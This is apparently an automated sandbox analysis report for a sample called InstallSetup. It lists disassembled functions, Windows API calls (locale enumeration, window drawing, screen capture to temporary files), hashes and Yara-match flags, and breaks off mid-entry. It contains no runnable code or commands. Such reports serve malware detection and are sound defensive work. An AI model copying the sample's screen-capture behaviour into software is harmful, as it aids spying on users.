Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 00975427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0097047A,?,00000004), ref: 0097547A

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 0a46b5617a95fdf8bc16e74955067f1615319d6c05de42b32db4e963248f32de
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: 52F02B32680318BFDB016F50CC02F6E7B65EF44B02F518115FC0966190DAB19D20A689

Function 00975034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0096E654: RtlEnterCriticalSection.NTDLL(004F0DAF), ref: 0096E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0097506C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction ID: 8e73c68774eb0b479f74e30899e8c5b82aef6f77d05ed9ba5d209cbd5ff4dbf7
Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
Instruction Fuzzy Hash: B4F04F36A10304DFE710EF68D906B5D77E0EF85722F104166F904DB2E6C7759954CB49

Function 00434DCD Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49

Function 0097B4E9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
Part of subcall function 00972141: _free.LIBCMT ref: 00972178
Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0097BCAB,00970A1C,?,?,?,?,?,00970A1C,?,?,?), ref: 0097B520

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction ID: a647100eeaee62fdf3c57a7b21bea0bed2223c4014768f90d5ff18faaaef3207
Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Instruction Fuzzy Hash: 1BF0E53B30020957CB089F36DC5576ABF94EFC2754B5A805DEF098B291D7759942C790

Function 0043B282 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794

Function 009508CD Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00410672,0094FE60), ref: 009508D2

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 00410666 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
Instruction Fuzzy Hash:

Function 0043BBC1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0043BBC1

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08

Function 004373D9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105

Function 004071AB Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96

Function 009676EB Relevance: .4, Instructions: 356COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction ID: 246578b2d0557cf5b0a65fc35a1e143f1bd25bfd11811e4f2efe0daca7fa198a
Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
Instruction Fuzzy Hash: 3BD1F63210C1A30ECB2D4AB9847003AFFE56A523A531D479EE4F7CB5C6ED24D954DA60

Function 00967FCE Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: c5764a4625c98dcb209072b753dd2c0aac59f0c470dd6ec271d1d3a38ebfcb46
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 5091647220D0E34EDB2D467E857407FFFE55A523A131A0B9ED4F2CA1C5EE28C569E620

Function 00427D67 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624

Function 00968289 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: f7d57be7dc2ee3038b6ae9d424b1b1cfe041d212c138d6e12ab30ca128035453
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: F291947210C0E34EDB69467E853843FFFE55A527A131A0B9EE4F2CA1D5FE24C564E620

Function 00428022 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628

Function 00967D07 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: b44f4b77b3939d2b51fdd2b8bb386af113c9d168fbb35ad13dbcccafd4a0dc8b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 6E91967210C0A30EDB2A46BD853443EFFE55E513A931A0BDED4F2CB1D5EE29C954DA20

Function 00427AA0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628

Function 0096D755 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction ID: 44c79e78095e1488f8de3dd1fe8613cf40767fd9c688572c5ccac37bcc8ecc7f
Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
Instruction Fuzzy Hash: 60618BB1F0370957EB386A2C8C99BBE639CDF95740F18081AE8B2DF2C1D619DD418396

Function 0042D4EE Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E

Function 00967A5D Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: d4316a2c24ecae29a937d76a7ed0d7ce7e47fbf40562a08f011a6c44f581251a
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: AF81567220D0E34DDB6946BD857403EFFE55B523A931A0B9ED4F2CB2C5EE18CA54E620

Function 004277F6 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624

Function 009687C7 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 77b417697b5940ce1fb3a44eaedf89360556a161170b2e1e83cccc52beb11c03
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 991120B724004247D664C63ED8B45BBE79DEBCA3207BD477AD0614B758DF32D944E640

Function 00428560 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C

Function 00C00F93 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: f00c8918fc2aa6738e5f2c24d59fc603ba2f6fa4a6945101825310feb89c5dd4
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 1211CE72340101AFD750CF95DC81FA673EAEB89760B2A8065ED04CB352D679EC42D760

Function 00940D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8068ea80f1d368fdc3dd01e3f72fddacea9dc050a46abd4e245b775ed3158265
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 5F018F76A006148FDB21CF64C804FAA33B9EBC6316F4544A5DA0A9B281E774A9458F90

Function 004020FA Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
GetClientRect.USER32(?,?), ref: 0040214A
GetDC.USER32(?), ref: 00402151
CreateSolidBrush.GDI32(00646464), ref: 00402164
SelectObject.GDI32(00000000,00000000), ref: 00402178
CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
SelectObject.GDI32(00000000,00000000), ref: 00402191
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
SelectObject.GDI32(00000000,00000000), ref: 004021EA
SetBkMode.GDI32(?,00000001), ref: 00402267
SetTextColor.GDI32(?,00000000), ref: 00402276
_wcslen.LIBCMT ref: 0040227F

Strings

Tahoma, xrefs: 004021BE

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
String ID: Tahoma
API String ID: 3832963559-3580928618
Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14

Function 00402571 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004025CD
DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
ReleaseCapture.USER32 ref: 004025F2
GetDC.USER32(00000000), ref: 00402619
CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
CreateCompatibleDC.GDI32(?), ref: 004026A9
SelectObject.GDI32(00000000,00000000), ref: 004026B3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
ShowWindow.USER32(?,00000000), ref: 004026EA
GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
DeleteFileW.KERNEL32(?), ref: 00402731
DeleteDC.GDI32(00000000), ref: 00402738
DeleteObject.GDI32(00000000), ref: 0040273F
ReleaseDC.USER32(00000000,?), ref: 0040274D
DestroyWindow.USER32(?), ref: 00402754
SetCapture.USER32(?), ref: 004027A1
GetDC.USER32(00000000), ref: 004027D5
ReleaseDC.USER32(00000000,00000000), ref: 004027EB
GetKeyState.USER32(0000001B), ref: 004027F8
DestroyWindow.USER32(?), ref: 0040280D

Strings

gya, xrefs: 0040270B

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
String ID: gya
API String ID: 2545303185-1989253062
Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C

Function 0096E919 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0096E989
_free.LIBCMT ref: 0096E99F
_free.LIBCMT ref: 0096E9B0
_free.LIBCMT ref: 0096E9C1
_free.LIBCMT ref: 0096E9D8
GetCPInfo.KERNEL32(?,?), ref: 0096EA20

Part of subcall function 00976952: _free.LIBCMT ref: 009769BD

_free.LIBCMT ref: 0096EBCC
_free.LIBCMT ref: 0096EBDF
_free.LIBCMT ref: 0096EBED
_free.LIBCMT ref: 0096EBF8
_free.LIBCMT ref: 0096EC3A
_free.LIBCMT ref: 0096EC42
_free.LIBCMT ref: 0096EC4A
_free.LIBCMT ref: 0096EC52
_free.LIBCMT ref: 0096EC60

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction ID: a52276952407edf0aef2268696d0951df30aad4b0f87727beb6a5f895dda5566
Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
Instruction Fuzzy Hash: C4B18FB5900209AFDF11DF78C882BEEBBB8BF49300F14856DF499A7282D77599419B60

Function 0042E6B2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042E722
_free.LIBCMT ref: 0042E738
_free.LIBCMT ref: 0042E749
_free.LIBCMT ref: 0042E75A
_free.LIBCMT ref: 0042E771
GetCPInfo.KERNEL32(?,?), ref: 0042E7B9

Part of subcall function 004366EB: _free.LIBCMT ref: 00436756

_free.LIBCMT ref: 0042E965
_free.LIBCMT ref: 0042E978
_free.LIBCMT ref: 0042E986
_free.LIBCMT ref: 0042E991
_free.LIBCMT ref: 0042E9D3
_free.LIBCMT ref: 0042E9DB
_free.LIBCMT ref: 0042E9E3
_free.LIBCMT ref: 0042E9EB
_free.LIBCMT ref: 0042E9F9

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24

Function 0097A85F Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

